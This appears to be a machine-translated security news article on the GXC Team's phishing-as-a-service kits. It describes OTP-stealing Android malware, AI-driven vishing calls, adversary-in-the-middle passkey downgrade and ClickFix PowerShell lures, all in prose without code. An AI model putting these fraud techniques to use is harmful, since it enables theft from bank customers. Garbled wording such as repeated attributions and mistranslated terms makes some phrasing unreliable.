A Spanish-speaking cybercrime group called The GXC team has seen the combination of phishing kits with Android malware, taking malware-as-a-service (MaaS) offerings to a new level.
Singapore-based cybersecurity firm Group-IB, which has been tracking the cybercriminal actor since January 2023, described the malware solution as a “sophisticated AI-based phishing-as-a-service platform” capable of targeting users of more than 36 Spanish banks. , government agencies and 30 institutions worldwide.
A phishing kit costs between $150 and $900 a month, while a kit that includes a phishing kit and Android malware is available on a subscription basis for around $500 a month.
The campaign targets users of Spanish financial institutions, as well as tax and government services, e-commerce, banks and cryptocurrency exchanges in the United States, Great Britain, Slovakia and Brazil. To date, 288 phishing domains associated with this activity have been identified.
Also part of the range of services offered is the sale of stolen bank credentials and custom coding schemes for hire to other cybercriminal groups targeting banking, financial and cryptocurrency businesses.
“Unlike conventional phishing developers, the GXC team combined phishing kits with malware to steal SMS OTPs, turning the typical phishing attack scenario in a somewhat new direction,” security researchers Anton Ushakov and Martijn van den Berk said in a report on Thursday.
What’s notable here is that instead of directly using a fake page to capture credentials, the threat actors encourage victims to download an Android-based banking app to prevent phishing attacks. These pages are distributed through smishing and other methods.
Once installed, the app asks for permissions to be set as the default SMS app, allowing it to intercept one-time passwords and other messages and forward them to a Telegram bot under their control.
“At the final stage, the program opens the real bank’s website in WebView, allowing users to interact with it normally,” the researchers said. “After that, whenever an attacker triggers an OTP request, the Android malware silently receives and forwards SMS messages containing OTP codes to a Telegram chat controlled by the threat actor.”
Other services touted by the threat on a dedicated Telegram channel include AI-powered voice calling tools that allow customers to generate voice calls to potential targets based on a series of prompts directly from the phishing kit.
These calls usually pretend to be banking, with instructions to provide your two-factor authentication (2FA) codes, install malware, or perform other arbitrary actions.
“The use of this simple but effective mechanism makes the fraud scenario even more convincing to their victims and demonstrates how quickly and easily AI tools are adopted and implemented by criminals in their schemes, transforming traditional fraud scenarios into new, more sophisticated tactics,” the researchers said. noted.
In a recent report, Google-owned company Mandiant showed how artificial intelligence-assisted voice cloning has the ability to mimic human speech with “uncanny accuracy,” allowing phishing (or vishing) schemes to sound more authentic, facilitating initial access, privilege escalation , and lateral movement.
“Threat subjects may impersonate managers, colleagues, or even IT support staff to trick victims into revealing sensitive information, providing remote access to systems, or transferring funds,” the threat intelligence firm said. said.
“Intrinsic trust associated with a familiar voice can be used to manipulate victims into taking actions they wouldn’t normally do, such as clicking on malicious links, downloading malware, or disclosing sensitive data.”
Phishing kits that also come with an adversary in the middle (AITM) possibilities, became increasingly popular as they lower the technical barrier to entry for large-scale phishing campaigns.
Security researcher mr.d0x, in a the report published last month, says attackers can take advantage of Progressive Web Apps (PWAs) to design convincing phishing login pages by manipulating user interface elements to display a spoofed URL string.
Moreover, such AiTM phishing kits can also be used to hack accounts that are protected access keys on various Internet platforms using a so-called authentication method editing attack, which exploits the fact that these services still offer a less secure authentication method as a backup mechanism, even when access keys have been configured.
“Because AitM can manipulate the representation presented to the user by changing the HTML, CSS, and images or JavaScript on the login page when it is proxied to the end user, they can control the authentication flow and remove all references to access key authentication, Cyber Security Company eSentire said.
The disclosure comes amid a recent surge in phishing campaigns embedding URLs that have already been encoded using security tools such as Secure Email Gateways (SEGs) in an attempt to disguise phishing links and avoid crawling, according to Barracuda Networks and Coffens.
Social engineering attacks have also been observed using unusual techniques where users are encouraged to visit seemingly legitimate websites and then asked to manually copy, paste and execute obfuscated code in a PowerShell terminal under the guise of fixing problems with viewing content online. browser.
Details of how the malware was delivered have been disclosed previously documented from ReliaQuest and Proofpoint. McAfee Labs tracks activity under the alias ClickFix.
“By embedding Base64-encoded scripts into seemingly legitimate error prompts, attackers trick users into performing a series of actions that lead to the execution of malicious PowerShell commands,” researchers Yashvi Shah and Vignesh Dhatchanamurthy said.
“These teams typically download and execute payloads such as HTA files from remote servers, which then deploy malware such as DarkGate and Lumma Stealer.”
